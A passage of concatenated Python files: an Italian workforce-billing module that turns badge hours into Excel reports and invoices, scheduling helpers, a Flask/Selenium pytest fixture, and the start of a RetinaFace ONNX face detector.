parsed_day["ST"] += float(val)
# check every COD key for special hours
for key in day_content:
if key.startswith("COD") and any(day_content[key]):
# night shifts
if day_content[key][0] == "MN":
hours = day_content[key][1] if len(day_content[key][1]) >= 4 else "0" + day_content[key][1]
if "." in hours:
hours = hours.split(".")[0] + "." + self.__minutes_to_int(hours.split(".")[1])
hours = float(hours)
parsed_day["OR"] -= hours
parsed_day["MN"] += hours
# overtime night shifts
elif day_content[key][0] == "SN":
hours = day_content[key][1] if len(day_content[key][1]) >= 4 else "0" + day_content[key][1]
if "." in hours:
hours = hours.split(".")[0] + "." + self.__minutes_to_int(hours.split(".")[1])
hours = float(hours)
parsed_day["ST"] -= hours
parsed_day["SN"] += hours
# if day is holiday decrement ordinary to increase holiday values
try:
check_day = f"{self.billing_month}/{day[:-1]}/{self.billing_year}"
if check_day in self._holidays:
parsed_day["OF"] += parsed_day["OR"]
parsed_day["OR"] -= parsed_day["OR"]
parsed_day["SF"] += parsed_day["ST"]
parsed_day["ST"] -= parsed_day["ST"]
parsed_day["FN"] += parsed_day["MN"]
parsed_day["MN"] -= parsed_day["MN"]
except ValueError as e:
if str(e).startswith("Cannot parse date from string '2/29/"):
raise ValueError(f"ERRORE: {worker} ha lavorato il giorno 29 Febbraio di un anno non bisestile!")
to_return[worker][day] = parsed_day
return to_return
def _new_job_id(self):
id_lenght = 4
check_high = 0
for job in self.jobs:
if int(job["id"]) > check_high:
check_high = int(job["id"])
check_high = str(check_high + 1) # increment 1 from the highest id found among all jobs
new_id = "0"*(id_lenght-len(check_high)) + check_high
return new_id
def _new_client_id(self):
id_lenght = 4
check_high = 0
for client in self.clients:
if int(client["id"]) > check_high:
check_high = int(client["id"])
check_high = str(check_high + 1) # increment 1 from the highest id found among all clients
new_id = "0"*(id_lenght-len(check_high)) + check_high
return new_id
def _new_billing_profile_id(self):
id_lenght = 4
check_high = 0
for profile in self.billing_profiles:
if int(profile["id"]) > check_high:
check_high = int(profile["id"])
check_high = str(check_high + 1) # increment 1 from the highest id found among all billing profiles
new_id = "0"*(id_lenght-len(check_high)) + check_high
return new_id
def _add_job(self):
new_ = copy.deepcopy(self.default_new_job)
new_["id"] = self._new_job_id()
self.jobs.append(new_)
return True
def _rmv_job(self, pos):
if len(self.jobs) > 0:
self.jobs.pop(pos)
return True
def _add_client(self):
new_ = copy.deepcopy(self.default_new_client)
new_["id"] = self._new_client_id()
self.clients.append(new_)
return True
def _rmv_client(self, pos):
if len(self.clients) > 0:
self.clients.pop(pos)
return True
def _add_billing_profile(self):
new_ = copy.deepcopy(self.default_billing_profile)
new_["id"] = self._new_billing_profile_id()
self.billing_profiles.append(new_)
return True
def _rmv_billing_profile(self, pos):
if len(self.billing_profiles) > 0:
self.billing_profiles.pop(pos)
return True
def _create_model(self):
sh_name = "Report Fatturazione"
empty_rows_per_worker = 10
footer_color = PatternFill(start_color=self.footer_color, end_color=self.footer_color, fill_type="solid")
error_color = PatternFill(start_color=color_red[1:], end_color=color_red[1:], fill_type="solid")
separator = Border(top=Side(border_style='thin', color="000000"))
combobox_background = PatternFill(start_color="cce6ff", end_color="cce6ff", fill_type="solid")
combobox_border = Border(bottom=Side(border_style='thin', color='e6f3ff'))
combobox_font = openpyxl.styles.Font(bold=True, color="e67300")
COLUMNS_TO_STYLE = ["J", "K", "L"] # style those columns with comboboxes parameters up here
COLUMNS_TO_HIDE = {"first":"B","last":"H"}
# parse data from given excel
total_content = self._parse_badges()
total_content = self._parse_days(total_content)
totals = self.parse_total(total_content)
total_workers_hours = totals[0]
df = pd.DataFrame.from_dict(total_workers_hours).T
# sort alphabetically rows and columns, renaming index
df = df.sort_index()
df.rename(index=lambda x: self.__smart_renamer(x), inplace=True)
# adding "total" row and "total" column
df.loc[">> ORE TOTALI <<"] = df.sum(axis=0, numeric_only=True)
df['TOTALI'] = df.sum(axis=1, numeric_only=True)
user_columns = [
"cliente",
"profilo",
"mansione",
"ore_ordinarie",
"ore_straordinarie",
"ore_notturne",
"ore_festive",
"ore_straordinarie_festive",
"ore_straordinarie_notturne",
"ore_festive_notturne",
"totale"
]
df_utente = pd.DataFrame(columns=user_columns)
df = pd.concat([df,df_utente], axis=1)
df.fillna("", inplace=True)
df.index.rename("LAVORATORI", inplace=True)
############### GENERATING EXCEL MODEL
with pd.ExcelWriter(self.model_name, mode="w") as writer:
# create client, billing_profile, job lookup in a different sheet
check_sheet = "check_sheet"
check_ws = writer.book.create_sheet(check_sheet)
check_ws.title = check_sheet
vals_ = {
"clients": [f"{x['id']} {x['name']}" for x in self.clients],
"billing_profiles": [f"{x['id']} {x['name']}" for x in self.billing_profiles],
"jobs": [f"{x['id']} {x['name']}" for x in self.jobs]
}
col_ = 1
for key in vals_:
row_ = 1
for entry in vals_[key]:
check_ws[f"{get_column_letter(col_)}{row_}"].value = entry
row_ += 1
col_ += 1
# calculate check columns length
check_sheet_columns = {
"J":f'={check_sheet}!$A$1:$A$',
"K":f'={check_sheet}!$B$1:$B$',
"L":f'={check_sheet}!$C$1:$C$'
}
for i_, column in enumerate(check_ws.iter_cols(max_col=check_ws.max_column, max_row=check_ws.max_row)):
referral = list(check_sheet_columns.keys())[i_]
i_ += 1
column_lenght = 0
for cell in column:
if not cell.value:
break
column_lenght += 1
if not column_lenght:
column_lenght += 1
check_sheet_columns[referral] += str(column_lenght)
# hide check_sheet
check_ws.sheet_state = "hidden"
######################################################################################## MAIN BILL
df.to_excel(writer, sheet_name=sh_name, na_rep=0, float_format="%.2f")
ws = writer.sheets[sh_name]
# style last rows
last_rows_to_style = 1
added_rows = 1 # fixed, don't touch
for row in range(last_rows_to_style, 0, -1):
for cell in ws[f"{(len(df) + 1 + added_rows) - row}:{(len(df) + 1 + added_rows) - row}"]:
cell.font = openpyxl.styles.Font(bold=True)
cell.fill = footer_color
# adding blank rows
ws = writer.sheets[sh_name]
refer_ws = copy.deepcopy(ws)
check_name = None
for row in refer_ws.iter_rows(max_row=ws.max_row):
refer_name = row[0].value
if refer_name and refer_name.upper() != refer_name and refer_name != check_name:
for index, row_ in enumerate(ws.iter_rows()):
if row_[0].value == refer_name:
ws.insert_rows(index+2, empty_rows_per_worker)
check_name = refer_name
break
# set color, font weight, alignment of total column
for cell in ws[f"I1:I{ws.max_row}"]:
cell[0].font = openpyxl.styles.Font(bold=True)
cell[0].fill = footer_color
cell[0].alignment = Alignment(horizontal="center")
cell[0].number_format = '#,##0.00'
# adding formulas
for index, row in enumerate(ws.iter_rows()):
if index != 0 and index != 1 and index != ws.max_row:
row_total_formula = f"=SUM(M{index}:S{index})"
ws[f"T{index}"] = row_total_formula
ws[f"T{index}"].number_format = '#,##0.00'
if row[0].value and row[0].value.upper() != row[0].value:
wtfi = index + (empty_rows_per_worker+1) # worker total formula index
worker_total_formula = f"=SUM(T{index+1}:T{wtfi})-I{index+1}"
ws[f"U{wtfi}"] = worker_total_formula
ws[f"U{wtfi}"].number_format = '#,##0.00'
# adjust column width
for index, row in enumerate(ws.iter_cols()):
index +=1
if index == 1:
ws.column_dimensions[get_column_letter(index)].width = 20
elif index >=2 and index <=9:
ws.column_dimensions[get_column_letter(index)].width= 8
elif index >= 10 and index <= 12:
ws.column_dimensions[get_column_letter(index)].width = 25
else:
ws.column_dimensions[get_column_letter(index)].width = 15
# adding comboboxes
for col in COLUMNS_TO_STYLE:
try:
dv = DataValidation(type="list", formula1=check_sheet_columns[col], allowBlank=True)
ws.add_data_validation(dv)
dv.add(f"{col}2:{col}{ws.max_row - 1}")
except KeyError:
raise KeyError(f"ERRORE: nessuna lista di controllo per le celle della colonna {col}")
for cell in ws[f"{col}2:{col}{ws.max_row-1}"]:
cell[0].font = combobox_font
cell[0].fill = combobox_background
cell[0].alignment = Alignment(horizontal="left")
cell[0].border = combobox_border
# set border between workers
for row in ws.iter_rows(max_row=ws.max_row):
if row[0].value and row[0].value.upper() != row[0].value:
for cell in row:
# if already styled keep bottom style
if cell.border.bottom.color is not None or cell.border.bottom.style is not None:
temp_ = copy.deepcopy(separator)
temp_.bottom.color = cell.border.bottom.color
temp_.bottom.style = cell.border.bottom.style
cell.border = temp_
continue
cell.border = separator
# hide columns
ws.column_dimensions.group(COLUMNS_TO_HIDE["first"], COLUMNS_TO_HIDE["last"], outline_level=1, hidden=True)
# freeze first column and row
ws.freeze_panes = ws["B2"]
# add conditional formatting
ws.conditional_formatting.add(f'U2:U{ws.max_row}', formatting.rule.CellIsRule(operator='notEqual', formula=[0], fill=error_color))
def _create_comparison(self, gp_filepath):
sh_name = "Comparazione"
footer_color = PatternFill(start_color=self.footer_color, end_color=self.footer_color, fill_type="solid")
error_color = PatternFill(start_color=color_red[1:], end_color=color_red[1:], fill_type="solid")
separator = Border(top=Side(border_style='thin', color="000000"))
# parse data from given excel
total_content = self._parse_badges()
total_content = self._parse_days(total_content)
totals = self.parse_total(total_content)
total_workers_hours = totals[0]
# get cartellini df
df = pd.DataFrame.from_dict(total_workers_hours).T
df.index.rename("LAVORATORI", inplace=True)
df = df.sort_index()
df.rename(index=lambda x: self.__smart_renamer(x), inplace=True)
df['TOTALI'] = df.sum(axis=1, numeric_only=True)
# get gp_df
gp_data = self.__get_gp_data(gp_filepath)
gp_df = pd.DataFrame.from_records(gp_data, index="Nome")
gp_df = gp_df.sort_index()
gp_df.rename(index=lambda x: self.__smart_renamer(x), inplace=True)
gp_df.rename(columns=lambda x: self.__gp_column_renamer(x), inplace=True)
gp_df['TOTALI'] = gp_df.sum(axis=1, numeric_only=True)
gp_df.index.rename("LAVORATORI", inplace=True)
# merge them
df = pd.concat([df, gp_df], axis=1)
df.index.rename("LAVORATORI", inplace=True)
df.fillna(0, inplace=True)
# adding "total" row
df.loc[">> ORE TOTALI <<"] = df.astype(float).sum(axis=0, numeric_only=True)
df = df.replace(0, "")
############### GENERATING EXCEL MODEL
with pd.ExcelWriter("Comparazione.xlsx", mode="w") as writer:
df.to_excel(writer, sheet_name=sh_name, na_rep=0, float_format="%.2f")
ws = writer.sheets[sh_name]
# style last rows
last_rows_to_style = 1
added_rows = 1 # fixed, don't touch
for row in range(last_rows_to_style, 0, -1):
for cell in ws[f"{(len(df) + 1 + added_rows) - row}:{(len(df) + 1 + added_rows) - row}"]:
cell.font = openpyxl.styles.Font(bold=True)
cell.fill = footer_color
# set color, font weight, alignment of totals column
totals_columns = ["I", "R"]
for col_ in totals_columns:
for cell in ws[f"{col_}1:{col_}{ws.max_row}"]:
cell[0].font = openpyxl.styles.Font(bold=True)
cell[0].fill = footer_color
cell[0].alignment = Alignment(horizontal="center")
cell[0].number_format = '#,##0.00'
# adding formulas
for index, row in enumerate(ws.iter_rows()):
if index != 0 and index != 1 and index != ws.max_row:
row_total_formula = f"=SUM(J{index}:Q{index})"
ws[f"R{index}"] = row_total_formula
ws[f"R{index}"].number_format = '#,##0.00'
try:
if row[0].value and row[0].value.upper() != row[0].value:
worker_total_formula = f"=I{index}-R{index}"
ws[f"S{index}"] = worker_total_formula
ws[f"S{index}"].number_format = '#,##0.00'
except AttributeError:
pass
# adjust column width
for index, row in enumerate(ws.iter_cols()):
index +=1
if index == 1:
ws.column_dimensions[get_column_letter(index)].width = 30
elif (index >=2 and index <=8) or (index >=10 and index <=17):
ws.column_dimensions[get_column_letter(index)].width= 10
else:
ws.column_dimensions[get_column_letter(index)].width = 15
# set border between workers
for row in ws.iter_rows(max_row=ws.max_row):
try:
if row[0].value and row[0].value.upper() != row[0].value:
for cell in row:
# if already styled keep bottom style
if cell.border.bottom.color is not None or cell.border.bottom.style is not None:
temp_ = copy.deepcopy(separator)
temp_.bottom.color = cell.border.bottom.color
temp_.bottom.style = cell.border.bottom.style
cell.border = temp_
continue
cell.border = separator
except AttributeError:
pass
# freeze first column and row
ws.freeze_panes = ws["B2"]
# add conditional formatting
ws["S1"].value = "DIFFERENZA"
ws["S1"].font = openpyxl.styles.Font(bold=True)
ws["S1"].alignment = Alignment(horizontal='center')
ws.conditional_formatting.add(f'S2:S{ws.max_row}', formatting.rule.CellIsRule(operator='notEqual', formula=[0], fill=error_color))
def _bill(self, model_path, profile_to_bill):
BILLING_MODEL = openpyxl.load_workbook(model_path) # file to scan
bpi = profile_to_bill # "<id> <name>"
profile_obj = self.get_billing_profile_obj(bpi.split()[0]) # full_profile object
pricelist = profile_obj["pricelist"]
### styles
rows_between_jobs = 4
job_font = openpyxl.styles.Font(bold=True, size=24)
job_border = Border(bottom=Side(border_style='thick', color='3385ff'))
header_font = openpyxl.styles.Font(bold=True)
footer_color = openpyxl.styles.PatternFill(start_color=self.footer_color, end_color=self.footer_color, fill_type="solid")
try:
bill_name = f"Fattura {bpi.split()[1:]} {self.billing_month}-{self.billing_year}.xlsx"
except:
bill_name = self.bill_name
job_schema = ["client_id", "billing_profile_id", "job_id"]
HOURS_TYPE = ["OR", "ST", "MN", "OF", "SF", "SN", "FN"]
try:
ws = BILLING_MODEL["Report Fatturazione"]
except:
raise Exception("Non ho trovato il foglio 'Report Fatturazione' nel file excel!")
# GROUP BY JOB
grouped_by_job = {}
active_name = None
for row in ws.iter_rows(max_row=ws.max_row, max_col=ws.max_column):
name = row[0].value
if name:
if name.upper() == name:
continue
active_name = name
if not name:
name = active_name
to_parse = [cell.value for cell in row[9:-2]] # get info from column J to column S
job_info = to_parse[0:3] # cliente, profilo, mansione
hours_info = to_parse[3:] # OR, ST, MN, OF, SF, SN, FN
job_info = dict(zip(job_schema, job_info))
hours_info = dict(zip(HOURS_TYPE, hours_info))
if job_info["billing_profile_id"] == bpi:
if job_info["job_id"] not in grouped_by_job:
grouped_by_job[job_info["job_id"]] = {}
if name not in grouped_by_job[job_info["job_id"]]:
grouped_by_job[job_info["job_id"]][name] = hours_info
# check if model contains workers for the given billing profile
if not grouped_by_job:
raise Exception("Il modello fornito non contiene lavoratori che abbiano svolto una mansione sotto quel profilo")
# WRITE BILL
title_ = bpi.split(" ", 1)[1]
wb = openpyxl.Workbook()
wb.remove(wb["Sheet"]) # remove default sheet
wb.create_sheet(title_)
wb.save(bill_name)
row_ = 1
for job_ in grouped_by_job:
header_row = None
ws = wb[title_]
# get job df
df = pd.DataFrame.from_dict(grouped_by_job[job_]).T
df = df.reindex(HOURS_TYPE, axis=1)
df.sort_index(inplace=True)
df.index.rename("LAVORATORI", inplace=True)
df.loc[">> ORE TOTALI <<"] = df.sum(axis=0, numeric_only=True)
df['TOTALE'] = df.sum(axis=1, numeric_only=True)
df.fillna(0.0, inplace=True)
# write job name
ws[f"A{row_}"].value = job_.split(" ", 1)[1]
ws[f"A{row_}"].font = job_font
for c_ in range(1,10):
ws[f"{get_column_letter(c_)}{row_}"].border = job_border
row_ += 1
# save for reference
header_row = row_
# write headers
col_ = 1
ws[f"{get_column_letter(col_)}{header_row}"].value = df.index.name
ws[f"{get_column_letter(col_)}{header_row}"].font = header_font
col_ += 1
for colname in df.columns.values:
ws[f"{get_column_letter(col_)}{header_row}"].value = colname.upper()
ws[f"{get_column_letter(col_)}{header_row}"].font = header_font
col_ += 1
row_ += 1
# get lookup from headers
lookup = {}
for r in ws.iter_rows(min_row=header_row, max_row=header_row, max_col=ws.max_column):
lookup = dict(zip([val.value for index, val in enumerate(r)],[index for index, val in enumerate(r)]))
break
# write workers and totals
for row in df.iterrows():
col_ = 1
worker = row[0]
w_hours = dict(row[1])
# for each header write the worker's corresponding value
for h_type in lookup:
val_to_write = None
if h_type == "LAVORATORI":
val_to_write = worker
elif h_type == "TOTALE":
val_to_write = f"=SUM(B{row_}:H{row_})"
else:
try:
val_to_write = w_hours[h_type]
except KeyError:
print(f"key {w_hours[h_type]} not found!")
ws[f"{get_column_letter(col_)}{row_}"].value = val_to_write
# check style last row
if worker == ">> ORE TOTALI <<":
ws[f"{get_column_letter(col_)}{row_}"].fill = footer_color
ws[f"{get_column_letter(col_)}{row_}"].font = header_font
if col_ < ws.max_column:
col_ += 1
# if last row calculate billing hours for current job
if worker == ">> ORE TOTALI <<":
billed_hours = dict(zip(lookup.keys(), [0.0 for entry in range(len(lookup.keys()))]))
for r in ws.iter_rows(min_row=row_, max_row=row_, max_col=ws.max_column): #header_row+1
for h_type in lookup:
if h_type == "LAVORATORI":
billed_hours[h_type] = ">> IMPONIBILE <<"
elif h_type == "TOTALE":
billed_hours[h_type] = f"=SUM(B{row_+1}:H{row_+1})"
else:
colNo = lookup[h_type]
to_sum = r[colNo].value
billed_hours[h_type] += to_sum
# move down a line
row_ += 1
# write billed hour row
for h_type in billed_hours:
colNo = lookup[h_type]
colNo += 1
if h_type in ["LAVORATORI", "TOTALE"]:
val_to_write = billed_hours[h_type]
else:
try:
price = None
# find price in pricelist
for p_ in pricelist:
if p_["tag"] == h_type:
price = float(p_["price"])
break
if not price:
raise
# (formula) multiply h_type total for its price
val_to_write = f"={get_column_letter(lookup[h_type]+1)}{row_-1}*{price}"
except:
raise Exception(f"ERRORE: valori imponibili non calcolabili")
# style cell
ws[f"{get_column_letter(colNo)}{row_}"].value = val_to_write
ws[f"{get_column_letter(colNo)}{row_}"].font = header_font
ws[f"{get_column_letter(colNo)}{row_}"].fill = footer_color
ws[f"{get_column_letter(colNo)}{row_}"].number_format = '#,##0.00€'
row_ += rows_between_jobs
else:
row_ += 1
# adjust columns width
for c_ in range(1,10):
# first column
if c_ == 1:
ws.column_dimensions[get_column_letter(c_)].width = 40
# next columns
else:
ws.column_dimensions[get_column_letter(c_)].width = 15
wb.save(bill_name)
return bill_name
""" PUBLIC METHODS """
def get_all_badges_names(self):
""" return an array of all names found in excel file """
xlsx_data, sheet_names, engine = self.__load_Excel_badges()
names = []
for sheetNo, sheet in enumerate(sheet_names):
sheet_data = xlsx_data[sheet] if engine == "openpyxl" else xlsx_data.get_sheet(sheetNo)
names.append(self.__get_badge_name(sheet_data))
return names
def get_jobname(self, job_id):
""" given id, gets job name """
name = ""
for job in self.jobs:
if job["id"] == job_id:
name = job["name"]
break
if not name and job_id:
name = f"Job {job_id} non trovato"
return name
def get_client_object(self, client_id):
client = None
for c in self.clients:
if c["id"] == client_id:
client = c
break
return client
def get_billing_profile_obj(self, billing_profile_id):
billing_profile = None
for profile in self.billing_profiles:
if profile["id"] == billing_profile_id:
billing_profile = profile
break
return billing_profile
def get_billing_profile_id(self, job_id):
""" return billing profile id given job id """
billing_profile_id = ""
for job in self.jobs:
if job["id"] == job_id:
billing_profile_id = job["billing_profile_id"]
break
if not billing_profile_id and job_id:
raise Exception(f"Billing Profile for Job {job_id} non trovato")
return billing_profile_id
def parse_total(self, data, divided_by_job=False):
"""
if divided_by_job == False return a tuple containing ({worker:total}, {total:total})
if divided_by_job == True return a tuple containing ({job:{<worker>:total, job_total:job_total}}, {total:total})
"""
total = {}
new_data = {}
if not divided_by_job:
for worker in data:
new_data[worker] = {}
for day in data[worker]:
for hour_type in data[worker][day]:
# add to worker data
if hour_type in new_data[worker]:
new_data[worker][hour_type] += data[worker][day][hour_type]
else:
new_data[worker][hour_type] = data[worker][day][hour_type]
# add to total
if hour_type in total:
total[hour_type] += data[worker][day][hour_type]
else:
total[hour_type] = data[worker][day][hour_type]
# round values
for h in new_data[worker]:
new_data[worker][h] = self.__round_float(new_data[worker][h], decimal_pos=2)
elif divided_by_job:
for job in data:
new_data[job] = {}
for worker in data[job]:
new_data[job][worker] = {}
for day in data[job][worker]:
for hour_type in data[job][worker][day]:
if hour_type not in new_data[job][worker]:
new_data[job][worker][hour_type] = 0.0
new_data[job][worker][hour_type] += data[job][worker][day][hour_type]
# parse total for job and round values
job_total = {}
for worker_ in new_data[job]:
for hour_type in new_data[job][worker_]:
# add to job_total
if hour_type not in job_total:
job_total[hour_type] = 0.0
job_total[hour_type] += new_data[job][worker_][hour_type]
# add to total
if hour_type not in total:
total[hour_type] = 0.0
total[hour_type] += new_data[job][worker_][hour_type]
new_data[job][worker_][hour_type] = self.__round_float(new_data[job][worker_][hour_type],
decimal_pos=2)
new_data[job]["job_total"] = job_total
# round values
for h in total:
total[h] = self.__round_float(total[h], decimal_pos=2)
return (new_data, total)
'''
# probably will be deleted
def parse_jobs_to_profiles(self, workers_jobs):
""" creating a dict from parsing every worker day to its billing profile and returning it """
workers_billing_profiles = {}
for w in workers_jobs:
workers_billing_profiles[w] = {}
for day in workers_jobs[w]:
if not workers_jobs[w][day]:
workers_billing_profiles[w][day] = ""
else:
workers_billing_profiles[w][day] = self.get_billing_profile_id(workers_jobs[w][day])
return workers_billing_profiles
def _bill(self, hours, jobs, billing_profiles, bill_by_job=True, dump_values=False, dump_detailed=False):
billed_hours = {}
####### single sheet
if not bill_by_job:
for w in hours:
billed_hours[w] = {}
w_hours = hours[w]
w_jobs = jobs[w]
w_billing_profiles = billing_profiles[w]
for day in w_hours:
day_job = w_jobs[day]
day_billing_profile_id = w_billing_profiles[day]
day_billing_profile = self.get_billing_profile_obj(day_billing_profile_id)
# if worker worked that day bill it, else append 0 values
if day_job:
billed_hours[w][day] = self.__apply_billing_profile(w_hours[day], day_billing_profile)
else:
billed_hours[w][day] = w_hours[day]
new_billed_hours, total_billing = self.parse_total(billed_hours, divided_by_job=False)
new_hours_data, total_hours = self.parse_total(hours, divided_by_job=False)
self.create_Excel(new_hours_data, total_billing, bill_by_job=bill_by_job)
#### a sheet for every job
elif bill_by_job:
hours_by_job = {}
for w in jobs:
if w != "job_total":
for day in jobs[w]:
current_job = jobs[w][day]
if current_job:
current_job = self.get_jobname(current_job)
if current_job not in hours_by_job:
hours_by_job[current_job] = {}
if w not in hours_by_job[current_job]:
hours_by_job[current_job][w] = {}
hours_by_job[current_job][w][day] = hours[w][day]
for job in hours_by_job:
billed_hours[job] = {}
for w in hours_by_job[job]:
if w != "job_total":
billed_hours[job][w] = {}
for day in hours_by_job[job][w]:
billed_hours[job][w][day] = self.__apply_billing_profile(hours_by_job[job][w][day],self.get_billing_profile_obj(billing_profiles[w][day]))
new_billed_hours, total_billing = self.parse_total(billed_hours, divided_by_job=True)
new_hours_data, total_hours = self.parse_total(hours_by_job, divided_by_job=True)
self.create_Excel(new_hours_data, new_billed_hours, bill_by_job=bill_by_job)
# conditional dump values
if dump_detailed:
with open("DETAIL_ore_lavoratori.json", "w") as f:
f.write(json.dumps(hours, indent=4, ensure_ascii=True))
with open("DETAIL_valori_da_fatturare.json", "w") as f:
f.write(json.dumps(billed_hours, indent=4, ensure_ascii=True))
if dump_values:
with open("ore_lavoratori.json", "w") as f:
f.write(json.dumps(new_hours_data, indent=4, ensure_ascii=True))
with open("valori_da_fatturare.json", "w") as f:
f.write(json.dumps(new_billed_hours, indent=4, ensure_ascii=True))
print(">> Billed Successfully")
def create_Excel(self, data, total_billing, transposed=True, bill_by_job=False):
for job in data:
total_ = data[job].pop("job_total") if bill_by_job else total_billing
# adjust to billing type
if bill_by_job:
df = pd.DataFrame.from_dict(data[job])
else:
job = "Report Fatturazione"
df = pd.DataFrame.from_dict(data)
if transposed:
df = df.T
# sort alphabetically rows and columns
df = df.sort_index()
df.rename(index=lambda x: self.__smart_renamer(x), inplace=True)
# add totals (rows total/column total)
df.loc[">> ORE TOTALI <<"] = df.sum(axis=0, numeric_only=True)
if bill_by_job:
df.loc[">> € DA FATTURARE <<"] = total_
df['TOTALI'] = df.sum(axis=1, numeric_only=True)
# polish
df.index.rename("LAVORATORI", inplace=True)
df.replace(0, np.nan, inplace=True)
#generating excel with df data
mode = "a" if os.path.exists(self.bill_name) else "w"
with pd.ExcelWriter(self.bill_name, mode=mode) as writer:
df.to_excel(writer, sheet_name=job, na_rep=0, float_format="%.2f")
ws = writer.sheets[job]
footer_color = PatternFill(start_color="e6e6e6", end_color="e6e6e6", fill_type="solid")
# color last rows
last_rows_to_style = 2 if bill_by_job else 1
added_rows = 2 if bill_by_job else 1
for row in range(last_rows_to_style, 0, -1):
for cell in ws[f"{(len(df)+1+added_rows)-row}:{(len(df)+1+added_rows)-row}"]:
cell.font = openpyxl.styles.Font(bold=True)
cell.fill = footer_color
if bill_by_job and row == last_rows_to_style:
cell.number_format = '#,##0.00€'
# if single sheet result break
if not bill_by_job:
break
'''
|
scheduling.py
|
"""
This module provides functionality for timing of methods.
"""
import time
import threading
def run_function_every_n_seconds(fn, fn_args, seconds):
"""
Runs a function every n seconds.
:param fn: The function to run
:param fn_args: Arguments to pass to the function as list
    :param seconds: Time interval in seconds between function executions
:return: None
"""
start_time = time.time()
while True:
fn(fn_args)
time.sleep(seconds - ((time.time() - start_time) % seconds))
def run_function_every_n_seconds_thread(fn, fn_args, seconds):
    """Runs run_function_every_n_seconds in a background thread."""
    thread = threading.Thread(name="run_function_every_n_seconds",
                              target=run_function_every_n_seconds, args=[fn, fn_args, seconds])
    thread.start()
def run_function_after_n_seconds(fn, fn_args, seconds):
"""
    Runs a function after n seconds have passed.
    :param fn: The function to run
    :param fn_args: Arguments to pass to the function as list
    :param seconds: Delay in seconds before the function is executed
    :return: None
"""
start_time = time.time()
time.sleep(seconds - ((time.time() - start_time) % seconds))
fn(fn_args)
def run_function_after_n_seconds_thread(fn, fn_args, seconds):
thread = threading.Thread(name="run_function_after_n_seconds",
target=run_function_after_n_seconds, args=[fn, fn_args, seconds])
thread.start()
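# Usage sketch (editor's addition, hedged): `heartbeat` and its single list argument
# are illustrative assumptions; only the helpers defined above are used.
if __name__ == "__main__":
    def heartbeat(args):
        # fn_args arrives as one positional argument (the list passed below)
        print("heartbeat from", args)

    # Runs heartbeat(["worker-1"]) once, roughly 2 seconds from now, without blocking the caller.
    run_function_after_n_seconds_thread(heartbeat, ["worker-1"], 2)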
|
conftest.py
|
import multiprocessing
import os
import tempfile
import threading
import time
import config
import pytest
from selenium import webdriver
from app import app, db
class LiveClient(object):
def __init__(self):
app.config.from_object(config.Config)
app.config.from_envvar("WOLFIT_SETTINGS")
app.config["WTF_CSRF_ENABLED"] = False
app.config["LIVESERVER_PORT"] = 5000
# app.config['SERVER_NAME'] = 'localhost'
def get_server_url(self):
"""
Return the url of the test server
"""
return "http://localhost:5000"
def begin(self):
db.session.close()
db.drop_all()
db.create_all()
self.ctx = app.app_context()
options = webdriver.ChromeOptions()
options.add_argument("headless")
self.browser = webdriver.Chrome(chrome_options=options)
# Start Flask server in a thread
threading.Thread(target=app.run).start()
time.sleep(0.5)
self.ctx.push()
def end(self):
# remove application context
self.ctx.pop()
self.browser.get(f"{(self.get_server_url())}/shutdown")
self.browser.quit()
@pytest.fixture(scope="module")
def client():
return LiveClient()
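# Usage sketch (editor's addition, hedged): a test in a separate module could drive the
# module-scoped `client` fixture above like this; the "/" route and the title assertion
# are assumptions about the app under test, not part of this project.
#
# def test_home_page_loads(client):
#     client.begin()
#     try:
#         client.browser.get(f"{client.get_server_url()}/")
#         assert client.browser.title
#     finally:
#         client.end()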
|
retinaface.py
|
import sys
import numpy as np
import cv2
import onnxruntime
import time
import queue
import threading
import json
import copy
def py_cpu_nms(dets, thresh):
""" Pure Python NMS baseline.
Copyright (c) 2015 Microsoft
Licensed under The MIT License
Written by Ross Girshick
"""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
keep = []
while order.size > 0:
i = order[0]
keep.append(i)
xx1 = np.maximum(x1[i], x1[order[1:]])
yy1 = np.maximum(y1[i], y1[order[1:]])
xx2 = np.minimum(x2[i], x2[order[1:]])
yy2 = np.minimum(y2[i], y2[order[1:]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
inds = np.where(ovr <= thresh)[0]
order = order[inds + 1]
return keep
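def _nms_demo():
    # Editor's sketch (hedged, illustrative values only): two heavily overlapping boxes
    # plus one distant box; with thresh=0.4 the near-duplicate (index 1) is suppressed
    # and indices [0, 2] are kept.
    dets = np.array([[10, 10, 50, 50, 0.9],
                     [12, 12, 52, 52, 0.8],     # overlaps box 0 -> suppressed
                     [100, 100, 140, 140, 0.7]], dtype=np.float32)
    return py_cpu_nms(dets, 0.4)                # -> [0, 2]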
def decode(loc, priors, variances):
data = (
priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:],
priors[:, 2:] * np.exp(loc[:, 2:] * variances[1])
)
boxes = np.concatenate(data, 1)
boxes[:, :2] -= boxes[:, 2:] / 2
boxes[:, 2:] += boxes[:, :2]
return boxes
def worker_thread(rfd, frame):
results = rfd.detect_retina(frame, is_background=True)
rfd.results.put(results, False)
rfd.finished = True
rfd.running = False
class RetinaFaceDetector():
def __init__(self, model_path="models/retinaface_640x640_opt.onnx", json_path="models/priorbox_640x640.json", threads=4, min_conf=0.4, nms_threshold=0.4, top_k=1, res=(640, 640)):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = threads
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.session = onnxruntime.InferenceSession(model_path, sess_options=options)
self.res_w, self.res_h = res
with open(json_path, "r") as prior_file:
self.priorbox = np.array(json.loads(prior_file.read()))
self.min_conf = min_conf
self.nms_threshold = nms_threshold
self.top_k = top_k
self.finished = False
self.running = False
self.results = queue.Queue()
def detect_retina(self, frame, is_background=False):
h, w, _ = frame.shape
im = None
im = cv2.resize(frame, (self.res_w, self.res_h), interpolation=cv2.INTER_LINEAR)
resize_w = w / self.res_w
resize_w = 1 / resize_w
resize_h = h / self.res_h
resize_h = 1 / resize_h
im = np.float32(im)
scale = np.array((self.res_w / resize_w, self.res_h / resize_h, self.res_w / resize_w, self.res_h / resize_h))
im -= (104, 117, 123)
im = im.transpose(2, 0, 1)
